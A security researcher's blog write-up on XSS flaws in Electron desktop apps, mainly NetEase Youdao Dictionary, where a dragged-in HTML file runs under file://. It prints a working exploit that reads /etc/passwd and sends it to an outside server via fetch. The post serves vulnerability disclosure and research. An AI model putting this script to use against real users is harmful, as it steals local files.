[+] Author:MagicBlue
[+] Team: NeSE security team
[+] From: https://magicbluech.github.io
[+] Create: 2018-06-22

Introduction

Recently I have been studying Lambda (function as a service) and machine learning, and I will share the security cases with you.
Today I will share two sweet treats about Electron.

“If you can build a website, you can build a desktop app. Electron is a framework for creating native applications with web technologies like JavaScript, HTML, and CSS. It takes care of the hard parts so you can focus on the core of your application.”

XSS In NetEase Youdao Dictionary

The first case came up when I was using the dictionary to look up words. NetEase Youdao Dictionary has a built-in browser, and files can be dragged into it. Dragging an HTML file into it loads that file, which leads to an XSS vulnerability. It's really interesting.

payload.html

<script>
  // Show the page's URL in a prompt; this reveals which origin the page runs under
  prompt(1, document.location.href)
</script>

[Screenshot: demo1]

The prompt shows that the page runs under the file:// origin, so we try to read other files on the computer.

exp.html

<script>
  // Read a local file; this only succeeds because the page runs under file://
  const getFile = () => {
    fetch("/etc/passwd").then(res => {
      return res.text()
    }).then(text => {
      sendFile(text);
    })
  }

  // Send the file contents to the author's server
  const sendFile = (text) => {
    fetch(`https://blue.exeye.io/?file=${encodeURIComponent(text)}`)
  }

  getFile();
</script>

This is interesting because in modern browsers the file:// scheme also follows a same-origin policy: in a modern browser such as Chrome, Firefox, or Safari, a page loaded from file:// is not allowed to read files from other directories, which is what makes this read notable here.

chrome   url file://   document.origin = null
firefox  url file://   document.origin = undefined
safari   url file://   document.origin = null

Once we can read the victim's files, we can read a project's .git directory and thereby recover all of the victim's files on macOS.

XSS In Netease Music

NetEase Cloud Music had previously been attacked by others using XSS vulnerabilities, and NetEase fixed part of it. While reversing the client, I found that the developers had added a strict CSP policy to fix the program. Although the developers fixed the bugs, I found a similar vulnerability.

I can't bypass the CSP policy.

In Conclusion

XSS does not exist only in web pages; it also exists in the Electron framework. If you find XSS in a desktop application, try to find the privileged domain and determine whether the page runs under the file:// domain: a privileged domain may lead to RCE, and the file:// domain may lead to arbitrary file read.

Many other XSS vulnerabilities exist in desktop applications; only one attack surface is shown here. This is just a dessert; please wait for my next study.

NetEase Youdao Dictionary Version: 2.3.1 (158)
Netease Music Version: 1.5.9 (622)